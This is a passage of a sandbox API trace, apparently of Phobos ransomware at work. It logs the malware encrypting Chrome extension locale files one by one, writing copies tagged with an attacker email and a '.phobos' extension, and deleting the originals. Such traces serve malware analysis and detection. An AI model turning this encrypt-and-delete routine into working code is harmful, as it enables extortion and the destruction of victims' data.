CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0165.009] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0165.009] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0165.009] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0165.009] CryptDestroyKey (hKey=0xa32968) returned 1 [0165.009] CloseHandle (hObject=0x134) returned 1 [0165.009] CloseHandle (hObject=0x17c) returned 1 [0165.010] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json")) returned 1 [0165.010] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0165.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.011] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=18702) returned 1 [0165.011] CloseHandle (hObject=0x17c) returned 1 [0165.011] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json")) returned 0x2020 [0165.011] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.011] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0165.011] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0165.012] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0165.012] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0165.012] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0165.012] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x490e, lpOverlapped=0x0) returned 1 [0165.020] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4910, dwBufLen=0x4910 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4910) returned 1 [0165.020] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4910, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4910, lpOverlapped=0x0) returned 1 [0165.021] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0165.021] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0165.021] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0165.021] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0165.021] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0165.021] CryptDestroyKey (hKey=0xa32968) returned 1 [0165.021] CloseHandle (hObject=0x17c) returned 1 [0165.021] CloseHandle (hObject=0x134) returned 1 [0165.022] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json")) returned 1 [0165.022] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0165.022] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0165.023] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=16506) returned 1 [0165.023] CloseHandle (hObject=0x134) returned 1 [0165.023] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json")) returned 0x2020 [0165.023] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.023] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0165.023] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0165.023] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0165.023] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.024] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0165.024] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0165.024] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x407a, lpOverlapped=0x0) returned 1 [0165.053] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4080, dwBufLen=0x4080 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4080) returned 1 [0165.053] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4080, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4080, lpOverlapped=0x0) returned 1 [0165.054] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0165.054] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0165.054] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0165.054] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0165.054] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0165.055] CryptDestroyKey (hKey=0xa32968) returned 1 [0165.055] CloseHandle (hObject=0x134) returned 1 [0165.055] CloseHandle (hObject=0x17c) returned 1 [0165.055] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json")) returned 1 [0165.056] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0165.056] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.056] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=16011) returned 1 [0165.056] CloseHandle (hObject=0x17c) returned 1 [0165.056] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json")) returned 0x2020 [0165.056] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.056] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.057] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0165.057] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0165.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0165.057] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0165.057] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0165.057] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3e8b, lpOverlapped=0x0) returned 1 [0165.151] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3e90, dwBufLen=0x3e90 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3e90) returned 1 [0165.152] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3e90, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3e90, lpOverlapped=0x0) returned 1 [0165.217] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0165.217] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0165.217] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0165.217] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0165.217] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0165.217] CryptDestroyKey (hKey=0xa32968) returned 1 [0165.217] CloseHandle (hObject=0x17c) returned 1 [0165.217] CloseHandle (hObject=0x134) returned 1 [0165.545] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json")) returned 1 [0165.546] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0165.546] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0165.547] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=16462) returned 1 [0165.547] CloseHandle (hObject=0x190) returned 1 [0165.547] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json")) returned 0x2020 [0165.547] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0165.547] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0165.547] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0165.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0165.547] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c68) returned 1 [0165.547] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0165.547] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x404e, lpOverlapped=0x0) returned 1 [0165.574] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4050, dwBufLen=0x4050 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4050) returned 1 [0165.575] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4050, lpOverlapped=0x0) returned 1 [0165.575] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ce8) returned 1 [0165.576] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0165.576] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0165.576] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0165.576] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0165.576] CryptDestroyKey (hKey=0xa32c68) returned 1 [0165.576] CloseHandle (hObject=0x190) returned 1 [0165.576] CloseHandle (hObject=0x14c) returned 1 [0165.576] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json")) returned 1 [0165.577] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0165.577] CreateFileW 